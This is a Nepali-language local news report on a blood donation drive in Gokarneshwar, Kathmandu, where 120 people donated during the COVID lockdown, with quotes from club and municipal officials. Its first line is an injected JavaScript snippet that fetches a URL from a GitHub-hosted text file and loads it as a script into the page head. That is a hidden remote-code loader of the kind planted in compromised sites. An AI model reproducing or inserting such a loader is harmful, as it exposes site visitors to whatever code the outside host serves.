;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
२६ भद्र, काठमाडौँ |
काठमाडौँको गोकर्णेश्वर नगरपालिका वडा नम्बर ७ दक्षिण ढोकामा आज दक्षिण ढोका उत्थान युवा क्लवको नेतृत्वमा र मूल ढोका एकीकृत युवा क्लब र गोकर्णेश्वर नगरपालिका स्वयंसेवक परिचालक समितिको संयुक्त आयोजनामा भएको रक्तदान कार्यक्रममा १२० जनाले रक्तदान गरेका छन् |
दक्षिण ढोका उत्थान युवा क्लवका अध्यक्ष राजेश लामा (जिम्बा) को सभापतित्वमा उक्त रक्तदान कार्यक्रम भएको थियो भने सो कार्यक्रममा गोकर्णेश्वर नगरपालिकाका प्रमुख सल्लाहकार दिपक रिसाल प्रमुख अतिथिको रुपमा रहेका थिए |तेस्तै वडा नम्बर ७ र ९ गरि दुई वडाका वडाअध्यक्ष, गोकर्णेश्वर नगरपालिका स्वयंसेवक परिचालक समितिको प्रमुख दीपक लामा लगायतका व्यक्तिहरूको उपस्थिति रहेको थियो | कार्यक्रम संचालक समाजसेवी सम्भु प्रसाद अधिकारीले गरेका थिए |
“लक्डउनको समयमा कोरोना भाइरसको महामारीको बेला रगत दिने मानिस नभेट्ने र रक्तदान कार्यक्रमहरु पनि नभएर रगतको अभाव हुने कारणले गर्दा रक्तदान कार्यक्रम राखेर रगत संकलन गरेर रेडक्रस सोसाइटी सम्म पुर्याउने एउटा पुलले काम गरेको” क्लवको अध्यक्ष राजेश लामाले बताए | त्यस्तै “हाम्रो गोकर्णेश्वर नगरपालिकाका विभिन्न ठाउँहरुमा खाना खुवाउने काम, राहात वितरण र पछिल्लो समयमा रक्तदान कार्यक्रमहरु गर्दै आइरहेको” गोकर्णेश्वर नगरपालिका का प्रमुख सल्लाहकार दीपक रिसालको भनाइ छ |
रक्तदान कार्यक्रम बिहान ८ बजेदेखि सुरु भएको थियो भने दिनको १ बजे समापन भएको थियो
फेसबुक प्रतिक्रियाहरु